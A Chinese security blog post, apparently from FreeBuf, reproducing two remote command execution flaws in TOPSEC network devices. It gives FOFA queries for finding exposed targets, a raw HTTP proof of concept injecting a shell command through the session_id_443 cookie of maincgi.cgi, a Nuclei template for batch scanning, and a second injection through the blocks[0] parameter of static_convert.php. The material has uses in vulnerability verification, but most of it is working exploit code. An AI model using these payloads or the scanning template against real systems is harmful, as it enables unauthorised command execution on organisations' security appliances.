漏洞复现--天融信TOPSEC两处远程命令执行
免责声明:
文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责
一:漏洞描述
天融信(TOPSEC)是国内领先的网络安全解决方案提供商之一。他们专注于网络安全技术和产品的研发、生产和服务,为政府机构、企业和个人用户提供全面的网络安全解决方案。
二:漏洞影响版本
天融信TOPSEC
三:网络空间测绘查询
fofa:title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"
四:漏洞复现1
POC1:
GET /cgi/maincgi.cgi?Url=aa HTTP/1.1
Host: X.X.X.X
Cookie: session_id_443=1|echo 'vulnerability!' > /www/htdocs/site/image/vul.txt;
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
访问/site/image/vul.txt
五:批量检测
id: Trx-topsec-maincgi-cookie-rce
info:
name: Trx-topsec-maincgi-cookie-rce
author: 芝士土拨鼠
severity: critical
description: 天融信(TOPSEC)是国内领先的网络安全解决方案提供商之一。他们专注于网络安全技术和产品的研发、生产和服务,为政府机构、企业和个人用户提供全面的网络安全解决方案。
variables:
file_name: "{{to_lower(rand_text_alpha(6))}}"
file_content: "{{to_lower(rand_text_alpha(15))}}"
requests:
- raw:
- |+
GET /cgi/maincgi.cgi?Url=aa HTTP/1.1
Host: {{Hostname}}
Cookie: session_id_443=1|echo '{{file_content}}' > /www/htdocs/site/image/{{file_name}}.txt;
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
- |
GET /site/image/{{file_name}}.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"
:漏洞复现2
fofa:app="天融信-上网行为管理系统"
POC:
GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'vulnerability!'%20>>%20/var/www/html/vul.txt%0A HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
访问vul.txt
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
文章目录